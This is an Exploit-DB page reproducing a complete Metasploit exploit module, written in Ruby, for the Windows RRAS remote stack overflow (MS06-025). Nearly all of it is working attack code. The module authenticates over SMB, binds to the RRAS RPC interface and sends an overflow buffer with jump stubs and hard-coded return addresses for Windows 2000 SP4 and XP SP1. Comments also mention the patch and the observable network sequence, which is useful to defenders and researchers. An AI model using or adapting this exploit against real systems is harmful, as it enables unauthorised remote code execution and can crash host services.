Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit)

EDB-ID:

16364




Platform:

Windows

Date:

2010-05-09


##
# $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	# Module metadata for the RRAS stack overflow addressed by MS06-025
	# (CVE-2006-2370). Applying that update, or disabling the Routing and
	# Remote Access service where it is not required, removes the exposure.
	# As the description notes, RRAS runs inside svchost.exe, so a failed
	# attempt can take down unrelated services hosted in the same process.
	#
	# @param info [Hash] module info merged by update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RRAS Service Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Windows Routing and Remote
				Access Service. Since the service is hosted inside svchost.exe, a failed
				exploit attempt can cause other system services to fail as well. A valid
				username and password is required to exploit this flaw on Windows 2000.
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
			'Author'         =>
				[
					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1104,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			# Per-target return addresses; each one is specific to the listed
			# service pack, which is why smb_peer_os is consulted in #exploit.
			'Targets'        =>
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],

			'DisclosureDate' => 'Jun 13 2006'))

		# SMBPIPE is interpolated after a single backslash in #exploit, so the
		# value is the bare pipe name (ROUTER or SRVSVC), not a full path.
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end

	# Authenticates over SMB, binds to the RRAS DCERPC interface on the chosen
	# named pipe and issues one oversized request to opnum 0x0C.
	#
	# Observable sequence on the target (all taken from the calls below): an
	# authenticated SMB session, a DCERPC bind to interface UUID
	# 20610036-fa22-11cf-9823-00a0c911e5df over ncacn_np on \ROUTER or \SRVSVC,
	# then a single request carrying a 0x4000-byte buffer to opnum 12. The
	# rescue clause treats STATUS_PIPE_DISCONNECTED as expected, presumably
	# because the service does not return normally from the call.
	#
	# @return [void]
	# @raise [StandardError] any RPC error other than NoResponse or a pipe
	#   disconnect is re-raised unchanged
	def exploit

		connect()
		smb_login()

		# Endpoint string for the RRAS interface on the configured pipe.
		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		print_status('Getting OS...')

		# Check the remote OS name and version
		os = smb_peer_os
		pat = ''

		# The overflow pattern differs per OS version. If neither regex
		# matches, pat stays empty, the request is still sent, and the status
		# line below prints the raw smb_peer_os string.
		case os
		when /Windows 5\.0/
			# Windows 2000 layout: payload first, then a jump stub, the
			# target return address and a back-jump into the payload.
			pat =
				payload.encoded +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /Windows 5\.1/
			# Windows XP layout: 0x4c bytes of filler, a jump stub, the
			# target return address, then the payload.
			pat =
				rand_text_alphanumeric(0x4c) +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'
		end

		# Two little-endian DWORDs (1, 0x49) followed by the pattern, padded
		# with random alphanumerics so the body is exactly 0x4000 bytes.
		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
		len = req.length
		# NDR-encoded argument block: a 0x20000 constant, the buffer length,
		# the buffer itself and the length again (looks like a counted byte
		# array; the exact IDL is not visible here).
		stb =
			NDR.long(0x20000) +
			NDR.long(len) +
			req           +
			NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")

		# A missing reply is ignored outright; any other error is re-raised
		# unless its message mentions STATUS_PIPE_DISCONNECTED.
		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end